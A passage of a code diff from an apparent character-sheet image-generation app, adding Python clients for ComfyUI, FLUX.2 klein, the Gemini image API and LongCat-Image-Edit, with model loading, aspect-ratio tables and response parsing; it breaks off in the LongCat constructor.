                    # Crop+resize to target aspect ratio
                    if (target_w, target_h) != (native_w, native_h):
                        image = self._crop_and_resize(image, target_w, target_h)
                        logger.info(f"Post-processed to: {image.size}")

                    return GenerationResult.success_result(
                        image=image,
                        message=f"Generated with ComfyUI/Qwen in {generation_time:.2f}s",
                        generation_time=generation_time
                    )

        return GenerationResult.error_result("No output images found")

    except Exception as e:
        logger.error(f"ComfyUI generation failed: {e}", exc_info=True)
        return GenerationResult.error_result(f"ComfyUI error: {str(e)}")
|
| 559 |
+
|
| 560 |
+
def unload_model(self):
    """Ask ComfyUI to drop loaded models and free memory.

    ComfyUI manages model lifetimes itself, so this is advisory;
    failures are logged but never raised.
    """
    try:
        payload = json.dumps({"unload_models": True}).encode('utf-8')
        request = urllib.request.Request(
            f"http://{self.server_address}/free", data=payload, method='POST'
        )
        urllib.request.urlopen(request)
        logger.info("Requested ComfyUI to free memory")
    except Exception as e:
        logger.warning(f"Failed to request memory cleanup: {e}")
|
| 573 |
+
|
| 574 |
+
@classmethod
|
| 575 |
+
def get_dimensions(cls, aspect_ratio: str) -> Tuple[int, int]:
|
| 576 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 577 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 578 |
+
return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
src/core/__init__.py
ADDED
|
@@ -0,0 +1,16 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Character Sheet Pro - Core API
|
| 3 |
+
==============================
|
| 4 |
+
|
| 5 |
+
Exposes core functionality for plugins.
|
| 6 |
+
"""
|
| 7 |
+
|
| 8 |
+
from .plugin_base import Plugin, PluginMetadata, PluginAPI
|
| 9 |
+
from .plugin_manager import PluginManager
|
| 10 |
+
|
| 11 |
+
__all__ = [
|
| 12 |
+
'Plugin',
|
| 13 |
+
'PluginMetadata',
|
| 14 |
+
'PluginAPI',
|
| 15 |
+
'PluginManager'
|
| 16 |
+
]
|
src/flux_klein_client.py
ADDED
|
@@ -0,0 +1,270 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
FLUX.2 Klein Client
|
| 3 |
+
===================
|
| 4 |
+
|
| 5 |
+
Client for FLUX.2 klein 4B local image generation.
|
| 6 |
+
Supports text-to-image and multi-reference editing.
|
| 7 |
+
"""
|
| 8 |
+
|
| 9 |
+
import logging
|
| 10 |
+
import time
|
| 11 |
+
from typing import Optional, List
|
| 12 |
+
from PIL import Image
|
| 13 |
+
|
| 14 |
+
import torch
|
| 15 |
+
|
| 16 |
+
from .models import GenerationRequest, GenerationResult
|
| 17 |
+
|
| 18 |
+
|
| 19 |
+
logger = logging.getLogger(__name__)
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
class FluxKleinClient:
    """
    Client for FLUX.2 klein models.

    Supports:
    - Text-to-image generation
    - Single and multi-reference image editing
    - Multiple model sizes (4B, 9B) and variants (distilled, base)
    """

    # Model variants - choose based on quality/speed tradeoff
    MODELS = {
        # 4B models (~13GB VRAM)
        "4b": "black-forest-labs/FLUX.2-klein-4B",            # Distilled, 4 steps
        "4b-base": "black-forest-labs/FLUX.2-klein-base-4B",  # Base, configurable steps
        # 9B models (~29GB VRAM, better quality)
        "9b": "black-forest-labs/FLUX.2-klein-9B",            # Distilled, 4 steps
        "9b-base": "black-forest-labs/FLUX.2-klein-base-9B",  # Base, 50 steps - BEST QUALITY
        "9b-fp8": "black-forest-labs/FLUX.2-klein-9b-fp8",    # FP8 quantized (~20GB)
    }

    # Legacy compatibility
    MODEL_ID = MODELS["4b"]
    MODEL_ID_BASE = MODELS["4b-base"]

    # Aspect ratio to dimensions mapping
    ASPECT_RATIOS = {
        "1:1": (1024, 1024),
        "16:9": (1344, 768),
        "9:16": (768, 1344),
        "21:9": (1536, 640),  # Cinematic ultra-wide
        "3:2": (1248, 832),
        "2:3": (832, 1248),
        "3:4": (896, 1152),
        "4:3": (1152, 896),
        "4:5": (896, 1120),
        "5:4": (1120, 896),
    }

    # Default settings for each model variant
    MODEL_DEFAULTS = {
        "4b": {"steps": 4, "guidance": 1.0},
        "4b-base": {"steps": 28, "guidance": 3.5},
        "9b": {"steps": 4, "guidance": 1.0},
        "9b-base": {"steps": 50, "guidance": 4.0},  # Best quality
        "9b-fp8": {"steps": 4, "guidance": 4.0},
    }

    def __init__(
        self,
        model_variant: str = "9b-base",  # Default to highest quality
        device: str = "cuda",
        dtype: torch.dtype = torch.bfloat16,
        enable_cpu_offload: bool = True,
        # Legacy params
        use_base_model: bool = False,
    ):
        """
        Initialize FLUX.2 klein client.

        Args:
            model_variant: Model variant to use:
                - "4b": Fast, 4 steps, ~13GB VRAM
                - "4b-base": Configurable steps, ~13GB VRAM
                - "9b": Better quality, 4 steps, ~29GB VRAM
                - "9b-base": BEST quality, 50 steps, ~29GB VRAM
                - "9b-fp8": FP8 quantized, ~20GB VRAM
            device: Device to use (cuda or cpu)
            dtype: Data type for model weights
            enable_cpu_offload: Enable CPU offload to save VRAM
            use_base_model: Legacy flag; when True and model_variant was left
                at its default, falls back to the old 4B base model.
        """
        # Handle legacy use_base_model parameter
        if use_base_model and model_variant == "9b-base":
            model_variant = "4b-base"

        self.model_variant = model_variant
        self.device = device
        self.dtype = dtype
        self.enable_cpu_offload = enable_cpu_offload
        self.pipe = None
        self._loaded = False

        # Per-variant defaults; unknown variants fall back to distilled settings.
        defaults = self.MODEL_DEFAULTS.get(model_variant, {"steps": 4, "guidance": 1.0})
        self.default_steps = defaults["steps"]
        self.default_guidance = defaults["guidance"]

        logger.info(f"FluxKleinClient initialized (variant: {model_variant}, steps: {self.default_steps}, guidance: {self.default_guidance})")

    def load_model(self) -> bool:
        """Load the model into memory.

        Idempotent: returns immediately if already loaded. On any failure the
        partially-loaded pipeline is released so VRAM is not held by a client
        that reports itself as not loaded.

        Returns:
            True on success, False on load or validation failure.
        """
        if self._loaded:
            return True

        try:
            # Get model ID for selected variant
            model_id = self.MODELS.get(self.model_variant, self.MODELS["4b"])
            logger.info(f"Loading FLUX.2 klein ({self.model_variant}) from {model_id}...")

            start_time = time.time()

            # FLUX.2 klein requires Flux2KleinPipeline (specific to klein models)
            # Requires diffusers from git: pip install git+https://github.com/huggingface/diffusers.git
            from diffusers import Flux2KleinPipeline

            self.pipe = Flux2KleinPipeline.from_pretrained(
                model_id,
                torch_dtype=self.dtype,
            )

            # Use enable_model_cpu_offload() for VRAM management (documented approach)
            if self.enable_cpu_offload:
                self.pipe.enable_model_cpu_offload()
                logger.info("CPU offload enabled")
            else:
                self.pipe.to(self.device)
                logger.info(f"Model moved to {self.device}")

            load_time = time.time() - start_time
            logger.info(f"FLUX.2 klein ({self.model_variant}) loaded in {load_time:.1f}s")

            # Validate by running a tiny test generation before declaring ready.
            logger.info("Validating model with test generation...")
            try:
                test_result = self.pipe(
                    prompt="A simple test image",
                    height=256,
                    width=256,
                    guidance_scale=1.0,
                    num_inference_steps=1,
                    generator=torch.Generator(device="cpu").manual_seed(42),
                )
                if test_result.images[0] is not None:
                    logger.info("Model validation successful")
                else:
                    logger.error("Model validation failed: no output image")
                    # FIX: previously the pipeline stayed resident in VRAM even
                    # though load_model() reported failure.
                    self.unload_model()
                    return False
            except Exception as e:
                logger.error(f"Model validation failed: {e}", exc_info=True)
                self.unload_model()  # release the pipeline on validation error
                return False

            self._loaded = True
            return True

        except Exception as e:
            logger.error(f"Failed to load FLUX.2 klein: {e}", exc_info=True)
            self.unload_model()  # drop any partial state and free the CUDA cache
            return False

    def unload_model(self):
        """Unload model from memory and release cached CUDA allocations."""
        if self.pipe is not None:
            del self.pipe
            self.pipe = None
        self._loaded = False

        if torch.cuda.is_available():
            torch.cuda.empty_cache()

        logger.info("FLUX.2 klein unloaded")

    def generate(
        self,
        request: GenerationRequest,
        num_inference_steps: Optional[int] = None,
        guidance_scale: Optional[float] = None,
        seed: int = 42,
    ) -> GenerationResult:
        """
        Generate image using FLUX.2 klein.

        Args:
            request: GenerationRequest object
            num_inference_steps: Number of denoising steps (defaults to the
                variant's recommended value, e.g. 4 for distilled models)
            guidance_scale: Classifier-free guidance scale (defaults per variant)
            seed: Random seed for the generator (default 42 preserves the
                previous hard-coded behaviour while allowing callers to vary it)

        Returns:
            GenerationResult object
        """
        # Lazy-load on first use.
        if not self._loaded:
            if not self.load_model():
                return GenerationResult.error_result("Failed to load FLUX.2 klein model")

        # Use model defaults if not specified
        if num_inference_steps is None:
            num_inference_steps = self.default_steps
        if guidance_scale is None:
            guidance_scale = self.default_guidance

        try:
            start_time = time.time()

            # Get dimensions from aspect ratio
            width, height = self._get_dimensions(request.aspect_ratio)

            logger.info(f"Generating with {self.model_variant}: steps={num_inference_steps}, guidance={guidance_scale}")

            # Build generation kwargs
            gen_kwargs = {
                "prompt": request.prompt,
                "height": height,
                "width": width,
                "guidance_scale": guidance_scale,
                "num_inference_steps": num_inference_steps,
                "generator": torch.Generator(device="cpu").manual_seed(seed),
            }

            # Add input images if present (for editing)
            if request.has_input_images:
                # FLUX.2 klein supports multi-reference editing.
                # A single reference is passed bare; multiple go as a list.
                valid_images = [img for img in request.input_images if img is not None]
                if len(valid_images) == 1:
                    gen_kwargs["image"] = valid_images[0]
                elif len(valid_images) > 1:
                    gen_kwargs["image"] = valid_images

            logger.info(f"Generating with FLUX.2 klein: {request.prompt[:80]}...")

            # Generate
            with torch.inference_mode():
                output = self.pipe(**gen_kwargs)
                image = output.images[0]

            generation_time = time.time() - start_time
            logger.info(f"Generated in {generation_time:.2f}s: {image.size}")

            return GenerationResult.success_result(
                image=image,
                message=f"Generated with FLUX.2 klein in {generation_time:.2f}s",
                generation_time=generation_time
            )

        except Exception as e:
            logger.error(f"FLUX.2 klein generation failed: {e}", exc_info=True)
            return GenerationResult.error_result(f"FLUX.2 klein error: {str(e)}")

    def _get_dimensions(self, aspect_ratio: str) -> tuple:
        """Get pixel dimensions for aspect ratio (delegates to the classmethod)."""
        # FIX: previously duplicated the parsing/lookup logic of get_dimensions().
        return self.get_dimensions(aspect_ratio)

    def is_healthy(self) -> bool:
        """Check if model is loaded and ready."""
        return self._loaded and self.pipe is not None

    @classmethod
    def get_dimensions(cls, aspect_ratio: str) -> tuple:
        """Get pixel dimensions for aspect ratio.

        Accepts labels with a trailing description (e.g. "16:9 wide");
        unknown ratios fall back to (1024, 1024).
        """
        ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
        return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
src/gemini_client.py
ADDED
|
@@ -0,0 +1,224 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Gemini API Client
|
| 3 |
+
=================
|
| 4 |
+
|
| 5 |
+
Client for Google Gemini Image APIs (Flash and Pro models).
|
| 6 |
+
Handles API communication and response parsing.
|
| 7 |
+
"""
|
| 8 |
+
|
| 9 |
+
import base64
|
| 10 |
+
import logging
|
| 11 |
+
from io import BytesIO
|
| 12 |
+
from typing import Optional
|
| 13 |
+
from PIL import Image
|
| 14 |
+
|
| 15 |
+
from google import genai
|
| 16 |
+
from google.genai import types
|
| 17 |
+
|
| 18 |
+
from .models import GenerationRequest, GenerationResult
|
| 19 |
+
|
| 20 |
+
|
| 21 |
+
logger = logging.getLogger(__name__)
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+
class GeminiClient:
    """
    Client for Gemini Image APIs.

    Supports:
    - Gemini 2.5 Flash Image (up to ~3 reference images)
    - Gemini 3 Pro Image Preview (up to 14 reference images, 1K/2K/4K)
    """

    # Model names (updated January 2026)
    # See: https://ai.google.dev/gemini-api/docs/image-generation
    MODEL_FLASH = "gemini-2.5-flash-image"  # Fast, efficient image generation
    MODEL_PRO = "gemini-3-pro-image-preview"  # Pro quality, advanced text rendering

    # Valid resolutions for Pro model
    VALID_RESOLUTIONS = ["1K", "2K", "4K"]

    # Aspect ratio to dimensions mapping
    # NOTE(review): some ratios differ from the local-model tables elsewhere in
    # this package (e.g. "4:3" here is 1344x1008) — presumably matching Gemini's
    # own output sizes; confirm before unifying.
    ASPECT_RATIOS = {
        "1:1": (1024, 1024),
        "16:9": (1344, 768),
        "9:16": (768, 1344),
        "21:9": (1536, 640),  # Cinematic ultra-wide
        "3:2": (1248, 832),
        "2:3": (832, 1248),
        "3:4": (864, 1184),
        "4:3": (1344, 1008),
        "4:5": (1024, 1280),
        "5:4": (1280, 1024),
    }

    def __init__(self, api_key: str, use_pro_model: bool = False):
        """
        Initialize Gemini client.

        Args:
            api_key: Google Gemini API key

            use_pro_model: If True, use Pro model with enhanced capabilities

        Raises:
            ValueError: If api_key is empty or None.
        """
        if not api_key:
            raise ValueError("API key is required for Gemini client")

        self.api_key = api_key
        self.use_pro_model = use_pro_model
        self.client = genai.Client(api_key=api_key)

        model_name = self.MODEL_PRO if use_pro_model else self.MODEL_FLASH
        logger.info(f"GeminiClient initialized with model: {model_name}")

    def generate(
        self,
        request: GenerationRequest,
        resolution: str = "1K"
    ) -> GenerationResult:
        """
        Generate image using Gemini API.

        Args:
            request: GenerationRequest object
            resolution: Resolution for Pro model ("1K", "2K", "4K");
                ignored when the Flash model is in use.

        Returns:
            GenerationResult object (never raises; API errors are wrapped
            into an error result).
        """
        try:
            model_name = self.MODEL_PRO if self.use_pro_model else self.MODEL_FLASH
            logger.info(f"Generating with {model_name}: {request.prompt[:100]}...")

            # Build contents list (reference images first, then the prompt)
            contents = self._build_contents(request)

            # Build config; resolution only applies to the Pro model
            config = self._build_config(
                request,
                resolution if self.use_pro_model else None
            )

            # Call API
            response = self.client.models.generate_content(
                model=model_name,
                contents=contents,
                config=config
            )

            # Parse response
            return self._parse_response(response)

        except Exception as e:
            logger.error(f"Gemini generation failed: {e}", exc_info=True)
            return GenerationResult.error_result(f"Gemini API error: {str(e)}")

    def _build_contents(self, request: GenerationRequest) -> list:
        """Build contents list for API request.

        Order matters: any non-None input images are placed before the text
        prompt, matching the multimodal content layout the API expects.
        """
        contents = []

        # Add input images if present
        if request.has_input_images:
            valid_images = [img for img in request.input_images if img is not None]
            contents.extend(valid_images)

        # Add prompt
        contents.append(request.prompt)

        return contents

    def _build_config(
        self,
        request: GenerationRequest,
        resolution: Optional[str] = None
    ) -> types.GenerateContentConfig:
        """Build generation config for API request.

        Args:
            request: Source of temperature and aspect-ratio settings.
            resolution: Optional output resolution; only honoured for the
                Pro model and validated against VALID_RESOLUTIONS.
        """
        # Parse aspect ratio: labels may carry a trailing description,
        # e.g. "16:9 wide" — only the leading token is sent to the API.
        aspect_ratio = request.aspect_ratio
        if " " in aspect_ratio:
            aspect_ratio = aspect_ratio.split()[0]

        # Build image config
        image_config_kwargs = {"aspect_ratio": aspect_ratio}

        # Add resolution for Pro model
        if resolution and self.use_pro_model:
            if resolution not in self.VALID_RESOLUTIONS:
                logger.warning(f"Invalid resolution '{resolution}', defaulting to '1K'")
                resolution = "1K"
            image_config_kwargs["output_image_resolution"] = resolution
            logger.info(f"Pro model resolution: {resolution}")

        config = types.GenerateContentConfig(
            temperature=request.temperature,
            response_modalities=["image", "text"],
            image_config=types.ImageConfig(**image_config_kwargs)
        )

        return config

    def _parse_response(self, response) -> GenerationResult:
        """Parse API response and extract image.

        Walks candidates[0].content.parts looking for inline image data,
        translating safety blocks and missing content into error results
        instead of raising.
        """
        if response is None:
            return GenerationResult.error_result("No response from API")

        if not hasattr(response, 'candidates') or not response.candidates:
            return GenerationResult.error_result("No candidates in response")

        candidate = response.candidates[0]

        # Check finish reason — safety blocks surface here, not as exceptions.
        if hasattr(candidate, 'finish_reason'):
            finish_reason = str(candidate.finish_reason)
            logger.info(f"Finish reason: {finish_reason}")

            if 'SAFETY' in finish_reason or 'PROHIBITED' in finish_reason:
                return GenerationResult.error_result(
                    f"Content blocked by safety filters: {finish_reason}"
                )

        # Check for content
        if not hasattr(candidate, 'content') or candidate.content is None:
            finish_reason = getattr(candidate, 'finish_reason', 'UNKNOWN')
            return GenerationResult.error_result(
                f"No content in response (finish_reason: {finish_reason})"
            )

        # Extract image from parts; the first inline_data part wins.
        if hasattr(candidate.content, 'parts') and candidate.content.parts:
            for part in candidate.content.parts:
                if hasattr(part, 'inline_data') and part.inline_data:
                    try:
                        image_data = part.inline_data.data

                        # Handle both bytes and base64 string payloads
                        if isinstance(image_data, str):
                            image_data = base64.b64decode(image_data)

                        # Convert to PIL Image; load() forces a full decode so
                        # corrupt payloads fail here rather than downstream.
                        image_buffer = BytesIO(image_data)
                        image = Image.open(image_buffer)
                        image.load()

                        logger.info(f"Image generated: {image.size}, {image.mode}")
                        return GenerationResult.success_result(
                            image=image,
                            message="Generated successfully"
                        )

                    except Exception as e:
                        logger.error(f"Failed to decode image: {e}")
                        return GenerationResult.error_result(
                            f"Image decoding error: {str(e)}"
                        )

        return GenerationResult.error_result("No image data in response")

    def is_healthy(self) -> bool:
        """Check if API is accessible.

        Note: only verifies an API key is present; no network round-trip.
        """
        return self.api_key is not None and len(self.api_key) > 0

    @classmethod
    def get_dimensions(cls, aspect_ratio: str) -> tuple:
        """Get pixel dimensions for aspect ratio.

        Accepts labels with a trailing description (e.g. "16:9 wide");
        unknown ratios fall back to (1024, 1024).
        """
        ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
        return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
src/longcat_edit_client.py
ADDED
|
@@ -0,0 +1,301 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
LongCat-Image-Edit Client
|
| 3 |
+
=========================
|
| 4 |
+
|
| 5 |
+
Client for Meituan's LongCat-Image-Edit model.
|
| 6 |
+
Supports instruction-following image editing with bilingual (Chinese-English) support.
|
| 7 |
+
|
| 8 |
+
This is a SOTA open-source image editing model with excellent:
|
| 9 |
+
- Global editing, local editing, text modification
|
| 10 |
+
- Reference-guided editing
|
| 11 |
+
- Consistency preservation (layout, texture, color tone, identity)
|
| 12 |
+
- Multi-turn editing capabilities
|
| 13 |
+
"""
|
| 14 |
+
|
| 15 |
+
import logging
|
| 16 |
+
import time
|
| 17 |
+
from typing import Optional, List
|
| 18 |
+
from PIL import Image
|
| 19 |
+
|
| 20 |
+
import torch
|
| 21 |
+
|
| 22 |
+
from .models import GenerationRequest, GenerationResult
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
logger = logging.getLogger(__name__)
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
class LongCatEditClient:
    """
    Client for LongCat-Image-Edit model from Meituan.

    Features:
    - Instruction-following image editing
    - Bilingual support (Chinese-English)
    - Excellent consistency preservation
    - Multi-turn editing

    Requires ~18GB VRAM with CPU offload.
    """

    # Hugging Face model repository ID
    MODEL_ID = "meituan-longcat/LongCat-Image-Edit"

    # Aspect ratio to dimensions mapping (width, height)
    ASPECT_RATIOS = {
        "1:1": (1024, 1024),
        "16:9": (1344, 768),
        "9:16": (768, 1344),
        "21:9": (1536, 640),  # Cinematic ultra-wide
        "3:2": (1248, 832),
        "2:3": (832, 1248),
        "3:4": (896, 1152),
        "4:3": (1152, 896),
        "4:5": (896, 1120),
        "5:4": (1120, 896),
    }

    # Default generation settings used when callers pass None
    DEFAULT_STEPS = 50
    DEFAULT_GUIDANCE = 4.5
|
| 60 |
+
|
| 61 |
+
def __init__(
|
| 62 |
+
self,
|
| 63 |
+
device: str = "cuda",
|
| 64 |
+
dtype: torch.dtype = torch.bfloat16,
|
| 65 |
+
enable_cpu_offload: bool = True,
|
| 66 |
+
):
|
| 67 |
+
"""
|
| 68 |
+
Initialize LongCat-Image-Edit client.
|
| 69 |
+
|
| 70 |
+
Args:
|
| 71 |
+
device: Device to use (cuda or cpu)
|
| 72 |
+
dtype: Data type for model weights (bfloat16 recommended)
|
| 73 |
+
enable_cpu_offload: Enable CPU offload to save VRAM (~18GB required)
|
| 74 |
+
"""
|
| 75 |
+
self.device = device
|
| 76 |
+
self.dtype = dtype
|
| 77 |
+
self.enable_cpu_offload = enable_cpu_offload
|
| 78 |
+
self.pipe = None
|
| 79 |
+
self._loaded = False
|
| 80 |
+
|
| 81 |
+
